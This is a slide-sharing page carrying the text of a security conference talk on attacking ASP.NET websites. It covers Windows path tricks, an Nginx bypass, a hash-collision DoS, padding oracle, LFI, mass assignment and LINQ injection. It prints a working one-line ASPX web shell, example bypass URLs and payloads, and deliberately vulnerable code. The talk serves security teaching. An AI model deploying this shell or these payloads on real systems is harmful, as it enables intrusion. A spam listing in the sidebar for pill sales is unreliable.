Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CorePositive Hack Days
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опытPositive Hack Days
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterPositive Hack Days
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиPositive Hack Days
 

More from Positive Hack Days (20)

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release Notes
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows Docker
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive Technologies
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + Qlik
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQube
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps Community
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для Approof
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложений
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложений
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application Security
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 лет
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на грабли
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПО
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке Си
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET Core
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опыт
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services Center
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атаки
 

Recently uploaded

Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfhans926745
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesBoston Institute of Analytics
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 

Recently uploaded (20)

+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 

Hack ASP.NET website

  • 1. TO HACK AN ASP .NET WEBSITE? HARD, BUT POSSIBLE! Vladimir Kochetkov Positive Technologies
  • 2. A Blast From The Past: File System DOS devices and reserved names: NUL:, CON:, AUX:, PRN:, COM[1-9]:, LPT[1-9]: - the colon is optional, names can be used as part of the path Reserved characters: < > : " / | ? * Case insensitivity of names: Filename == FileName == filename == FILENAME Support for short names 8.3: LongFileName.Extension ~= LONGFI~1.EXT ~= LO0135~1.EXT Ending characters: Filename == Filename... == Filename
  • 3. A Blast From The Past: File System Named pipe and mailslots (CreateFile): Hostpipe<name> , Hostmailslot<name> Alternative syntax of relative paths: C:Windowsnotepad.exe == C:notepad.exe , if Windows is a current catalog of C: Substitutions (FindFirstFile): < == * , > == ? , " == . UNC and Unicode paths: C:WindowsSystem32 HostC$WindowsSystem32 .C:WindowsSystem32 ?C:WindowsSystem32 ?UNCHostC$WindowsSystem32
  • 4. A Blast From The Past: File System Meta attributes and NTFS alternative data streams: Directory:<Name>:<Type>File:<Name>:<Type> Files Meta Attributes Indices Meta Attributes $STANDARD_INFORMATION $INDEX_ROOT $FILE_NAME $INDEX_ALLOCATION $DATA $BITMAP $ATTRIBUTE_LIST $OBJECT_ID $REPARSE_POINT C:Windowshh.exe == C:Windows:$I30:$INDEX_ALLOCATIONhh.exe C:Windowsnotepad.exe == C:Windowsnotepad.exe::$DATA FileName.aspx == FileName.aspx:.jpg
  • 5. [PT-2012-06] Nginx Restrictions Bypass Severity level: Medium (5.0) (AV:N/AC:L/Au:N/C:P/I:N/A:N) Vulnerable versions: Nginx for Windows <= v1.3 Vector: Remote The flaw enables an intruder to forward HTTP requests to certain URL addresses, bypassing the rules set in the Location directives of the web server configuration. By exploiting the vulnerability, a potential hacker could gain access to the application source code and closed parts of the website, detect new vulnerabilities, steal passwords to the database or other services, etc. :$I30:$INDEX_ALLOCATION were processed as a part of the catalog name.
  • 6. [PT-2012-06] Nginx Restrictions Bypass http://hostname/.svn/entries HTTP/1.1 403 Forbidden Server: nginx/1.2.0 … location ~/.svn/ { deny all; } … HTTP/1.1 200 OK Server: nginx/1.2.0 http://hostname/.svn::$INDEX_ALLOCATION/entries * A stable version of nginx-1.2.0 for Windows, released 2012-04-23
  • 8. Memory Corruption Interaction with native libraries, use of mix assemblies MS12-025, April 2012: - arbitrary code execution is triggered by exploitation of an integer overflow vulnerability in gdiplus.dll which causes heap corruption when calling the constructor of the System.Drawing.Imaging.EncoderParameter class. Insecure managed code unsafe void bufferOverflow(string s) { char* ptr = stackalloc char[10]; foreach (var c in s) { *ptr++ = c } }
  • 9. Turkish I And Other Peculiarities If two strings are compared with no regard to the current regional settings, the result might be quite unexpected: The English language: I&i The Turkish language: I&ı+İ&i <%@ Page Language="C#" Culture="Auto" %> <%@ Import Namespace="System.Globalization" %> <! DOCTYPE html> … <script runat="server"> … if (Session["mode"].ToLower() != "admin") … if (String.Compare(Request["path"]), 0, "FILE:", 0, 5, true) …
  • 10. Collision of Object Hashes System.Object.GetHashCode() returns a 32 bit hash code of an object (takes on values within the range from -2147483648 to 2147483647). (http://blogs.msdn.com/b/ericlippert/archive/2010/03/22/socks-birthdays-and-hash-collisions.aspx)
  • 11. Collision in ASP .NET (MS11-100) Standard situation: Unusual situation: 3QBZJK5ZX=&NEUQ7BWAV6=&6902D0YP6J=&9PZGHCDJYD=&NU73S3KNV=&IF686YJQJ8K=&9XUUCJEENJ=&F X4A75F91FM=&IGJKQVBZAVK=&LJVJV6J3UZ=&X7GJ5MWXY=&6AVIZWTVK=&WQNIQ7OZMS=&IM1VKMZHK6F=& DO9WX2R9H=&RYLZSIQT8V=&KR9BBFUH2E=&UI8N4SWVWW=&TL5F6URVPP=&B1P81FWDSVV=&CM6Y80XSAO=& LE72GBPWB=&EEFMULEXC=&M6FKM13WB=&MGN8123XA2K=&ZMI35GXHMN=&LXQQOM138LL=&XXST36DRX=&JR YRV54TFZ=&LGG3X9MFN7=&MH1NI402I22=&MHFIKIM0TEH=&BWPRVCQ4X3=&RM6K7V75WZ=&SMIAE6PAL4=& MOCGW14ZU7=&I0JKKKOG7EN=&Q4B9V7L3VZ=&23UAYU5B31=&9TRJE0XRWQ=&3Q3LKPC2K0=&D3ACY8973E= =&VGJPMCQHP=&AV6THWSCA7=&MH5SM8NPWB1=&P57KEP668X=&81C4LQ4DFY=&MPJBASYMRM=&25EWGNN5NE … over 4Mb form data … (https://github.com/HybrisDisaster/aspHashDoS)
  • 12. A Tricky Plan (Post-Mortem MS11-100) 1. Create 1000 collision strings for each combination ‘.NET version’/’hardware platform’ 2. Send each combination as POST request parameters 3. Measure the response time for each request 4. ??? 5. ;)
  • 15. ASP.NET Peculiarities Special catalogs and files: - App_Browser –browsers definition (*.browsers) - App_Code – a source code of helper classes and logics - App_Data – data stores - App_GlobalResources, App_LocalResources – application resources (*.resx, *.resources) - App_Themes – topics (*.skin, *.css, images, etc); - App_WebReferences – links to web services (*.wsdl, *.xsd, *.disco, *.discomap) - Bin – compiled builds used by the application - web.config, web.*.config – configuration files that determine settings of the web server and application
  • 16. ASP .NET Peculiarities Standard HTTP handlers: - WebResource.axd – access to the static resources embedded in the application assemblies. - ScriptResource.axd – access to JavaScripts embedded in the assemblies or stored on the disk. Usage: http://hostname/*Resource.axd?d=<resourceId>&t=<timestamp> Example: http://hostname/ScriptResource.axd?d=JuN78WBP_dBUR_BT9LH1wlP 8mXnNcENfktCX8YwH3sHG7wWwvn73TZaaChQhQtyzip3- kumGx1U67ntTt0sXKCn22VGvaQ3V4mXtCFgW9M1 where ‘d’ is an encrypted parameters: Q|~/Scripts/Script1.js,~/Scripts/Script2.js,~/Scripts/Script3.js|#|21c3 8a3a9b
  • 17. Padding Oracle (MS10-070) Consequences: – getting encryption/decryption keys:  authentication cookies  ViewState and Event Validation  Arguments for WebRecource.axd and ScriptResource.axd => Reading arbitrary files inside the application catalog Corrections:  Padding error returns a generic error message  A random number is used as IV  The format of encrypted strings is changed for their validation  ScriptResource.axd can handle only *.js files
  • 18. ASP .NET Features Standard HTTP handlers: - Trace.axd request tracing (available only in the debugging mode)
  • 19. Features of LFI exploitation Response.WriteFile(<vfilename>) - Allows including any file, except *.config, inside the application catalog - The file is included statically without code execution - Accepts virtual file name as an argument Server.Execute(<vfilename>) - Allows including any file, except for *.config, into the application catalog - Calls a handler for the sent file, includes the result into the response - Accepts virtual file name as an argument File.ReadAllText(<filename>) - Allows including any file if obtains enough privileges - The file is included statically without code execution - Accepts file name as an argument
  • 20. Minimum C# Shell <%@ Page Language="C#" %> <%@ Import Namespace="System.Diagnostics" %> <%= Process.Start( new ProcessStartInfo( "cmd","/c " + Request["c"] ) { UseShellExecute = false, RedirectStandardOutput = true } ).StandardOutput.ReadToEnd() %>
  • 21. ViewState Meant to transfer data on view element to the server. - Is transferred in the __VIEWSTATE parameter - Encryption and integrity are not ensured in many cases - Is used by developers for session data storage on the client, though is not meant for this - Violation of its integrity can trigger exploitation of various threats from XXS to violation of application’s functionality.
  • 22. Request and Event Validations Request Validation is an embedded simple WAF aimed at preventing XSS. Blocks all requests that contain: &# < followed by a letter, !, / and ? Besides, it skips extraneous parameters started with с __ Event Validation is an embedded mechanism of event data validation. It is a __EVENTVALIDATION parameter that stores hashes of acceptable elements of of forms, events, ViewState, etc. Contrary to the common belief, it is insufficient against CSRF attacks as a standard implementation instance.
  • 23. Mass Assignment Model: Controller: public class User public class UserController : Controller { { public int Id IUserRepository _userRepository; { get; set; } public UserController(IUserRepository userRepository) { public string UserName _userRepository = userRepository; { get; set; } } public string Password { get; set; } public ActionResult Edit(int id) { public bool IsAdmin var user = _userRepository.GetUserById(id); { get; set; } return View(user); } } [HttpPost] public ActionResult Edit(int id, FormCollection collection) { try { var user = _userRepository.GetUserById(id); UpdateModel(user); _userRepository.SaveUser(user); return RedirectToAction("Index"); } catch { return View(); } } }
  • 24. Mass Assignment (http://digitalbush.com/2012/03/05/mass-assignment-aspnet-mvc/)
  • 25. LINQ Injection LINQ is a query language embedded into the syntax of the .NET languages. var result = from item in itemsList where item.field1 % 2 == 0 orderby item.field2 descending select new { item.field2, item.field3 }; Expression.Lambda<Predicate<int>>( Expression.Equal( Expression.Modulo( parameterN, Expression.Constant(2) ), Expression.Constant(0) ), parameterN); var result = itemsList .Where(x => x.field1 % 2 == 0) .Select(x => new { x.field2, x.field3 }) .OrderByDescending(x => x.field2);
  • 26. LINQ Injection Dynamic LINQ is one of a few libraries used to create dynamic run- time LINQ requests. Features: - Definition of expressions by strings; var modifier = "0"; - Basic simple operations var result = itemsList - Access to members of static and .Where("field1 % 2 == " + modifier) .Select(x => new { x.field2, x.field3 }) instant data types .OrderByDescending(x => x.field2); - Type instantiation and anonymous types construction What if "modifier" is formed out of input data and contains 0 OR 1 == 1 ?
  • 27. LINQ Injection Injection’s limitations in Dynamic LINQ: - Access to fields, properties and methods is available only for a collection type or for accessible types specified in the ‘white list’ - All expression parts must be executed without errors; error messages do not contain useful output - Injection is performable only for isolated parts of requests Injection’s possibilities in Dynamic LINQ: - Authentication / authorization bypass - Unauthorized access to the collection data - Abuse of functionality (provided that the collection objects have the statefull fields) - Conduction of DoS attacks (DoS). Remote Code Execution is actual in other solutions
  • 28. NorthWind DEMO public AjaxStoreResult GetCustomers(int limit, int start, string dir, string sort) { var query = (from c in this.DBContext.Customers select new { c.CustomerID, c.CompanyName, c.ContactName, c.Phone, c.Fax, c.Region }).OrderBy(string.Concat(sort, " ", dir)); int total = query.ToList().Count; query = query.Skip(start).Take(limit); return new AjaxStoreResult(query, total); }
  • 30. Thank You for Your Attention! Questions? vkohetkov@ptsecurity.ru twitter: @kochetkov_v